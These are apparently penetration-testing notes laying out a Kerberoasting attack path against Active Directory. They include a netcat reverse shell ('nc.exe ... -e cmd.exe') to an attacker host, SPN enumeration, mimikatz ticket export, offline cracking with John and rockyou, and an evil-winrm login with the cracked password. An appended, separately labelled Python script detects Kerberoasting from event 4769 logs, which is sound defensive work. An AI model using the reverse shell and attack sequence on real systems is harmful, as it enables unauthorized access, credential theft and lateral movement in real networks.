Service Account Attacks (Example Path)
1. Make sure you have a stable shell. This ensures we can run mimikatz on the machine.
Transfer nc.exe, execute one of the following on the target, and have nc listening on Kali:
PS C:\Windows\Temp> C:\Windows\Temp\nc.exe 192.168.119.146 443 -e cmd.exe (powershell.exe)
C:\Inetpub\Scripts\nc.exe 192.168.119.181 443 -e cmd.exe
2. Go through the enumeration methods and check whether there are any service accounts.
- A SPN (Service Principal Name) is a unique name for a service on a host, used to associate that service with an Active Directory service account.
- Enumerate SPNs to obtain the IP address and port number of applications running on servers integrated with Active Directory.
- Query the Domain Controller in search of SPNs.
- SPN Examples
CIFS/MYCOMPUTER$ - file share access.
LDAP/MYCOMPUTER$ - querying AD info via LDAP.
HTTP/MYCOMPUTER$ - web services such as IIS.
nslookup of the service hostname -> see if there is an entry point here.
- Automated SPN enum scripts:
# Kerberoast: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
# Powershell Empire: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
Take note of the account name you found!
3. Transfer mimikatz.exe to the host and run it. (Sometimes the mimikatz version matters; try 2.2.0 if one doesn't work.)
4. Use the SPN to dump the Kerberos tickets.
- If we know the serviceprincipalname value from prior AD enumeration, we can target the SPN by requesting a service ticket for it from the Domain Controller and access resources from the service with our own ticket.
# request service ticket
PS> Add-Type -AssemblyName System.IdentityModel
PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '[service_principal_name]'
# export cached tickets
mimikatz > kerberos::list /export
It's important to take note of the "SAMAccountName", which we will use as the username at the next stage when we log in to the account via evil-winrm.
Crack SPN hashes
$ python3 tgsrepcrack.py rockyou.txt [ticket.kirbi] # locally crack hashes
PS> Invoke-Kerberoast.ps1 # crack hashes on target
# John the Ripper
Move the ticket to the kerberoast-master directory where the scripts live (mv /home/kali/transfer/AD/ticket.kirbi /home/kali/transfer/Downloads/kerberoast-master/)
$ python3 kirbi2john.py -o johncrackfile ticket.kirbi # convert ticket to john file
$ john --wordlist=rockyou.txt johncrackfile
After cracking the hashes, you can log in with the recovered password:
./evil-winrm.rb -i 10.11.1.121 -u sqlServer -p PASS
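Added defender-side example, not part of these notes: every service-ticket request made at the SPN/ticket step above is logged on the Domain Controller as Windows Security event 4769, so the same path can be spotted from the audit log. This Python parses a constructed 4769 export (field names TargetUserName, ServiceName, TicketEncryptionType, IpAddress are the real event fields; the rows are made up) and flags RC4 (0x17) tickets issued for user service accounts plus one requester sweeping several SPNs inside a short window.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

RC4_HMAC = "0x17"            # etype 23; AES domains should rarely issue RC4 service tickets
WINDOW = timedelta(minutes=5)
SPN_THRESHOLD = 3            # distinct service accounts from one requester within WINDOW

# Constructed sample export of event 4769 fields (not a real log).
SAMPLE_4769 = """\
TimeCreated,TargetUserName,IpAddress,ServiceName,TicketEncryptionType
2024-05-01T09:00:01,alice@CORP.LOCAL,192.0.2.10,FS01$,0x12
2024-05-01T09:00:05,alice@CORP.LOCAL,192.0.2.10,krbtgt,0x12
2024-05-01T09:01:10,bob@CORP.LOCAL,192.0.2.44,sqlServer,0x17
2024-05-01T09:01:11,bob@CORP.LOCAL,192.0.2.44,svc_http,0x17
2024-05-01T09:01:12,bob@CORP.LOCAL,192.0.2.44,svc_backup,0x17
2024-05-01T09:30:00,carol@CORP.LOCAL,192.0.2.77,sqlServer,0x17
"""

def parse_4769(text):
    """Read the CSV export into dicts, converting TimeCreated to datetime."""
    events = []
    for row in csv.DictReader(StringIO(text)):
        row["TimeCreated"] = datetime.fromisoformat(row["TimeCreated"])
        events.append(row)
    return events

def is_user_service(name):
    # Computer accounts end in '$'; krbtgt requests are TGT traffic, not Kerberoast targets.
    return not name.endswith("$") and name.lower() != "krbtgt"

def detect_kerberoast(events):
    """Return (rule, requester, detail) alerts for RC4 tickets and SPN sweeps."""
    alerts, by_requester, sweep_reported = [], defaultdict(list), set()
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if not is_user_service(ev["ServiceName"]):
            continue
        if ev["TicketEncryptionType"] == RC4_HMAC:
            alerts.append(("rc4_service_ticket", ev["TargetUserName"], ev["ServiceName"]))
        key = (ev["TargetUserName"], ev["IpAddress"])
        # Keep only this requester's events inside the sliding window.
        recent = [e for e in by_requester[key] + [ev]
                  if ev["TimeCreated"] - e["TimeCreated"] <= WINDOW]
        by_requester[key] = recent
        spns = tuple(sorted({e["ServiceName"] for e in recent}))
        if len(spns) >= SPN_THRESHOLD and key not in sweep_reported:
            sweep_reported.add(key)
            alerts.append(("spn_sweep", ev["TargetUserName"], spns))
    return alerts

if __name__ == "__main__":
    for alert in detect_kerberoast(parse_4769(SAMPLE_4769)):
        print(alert)
```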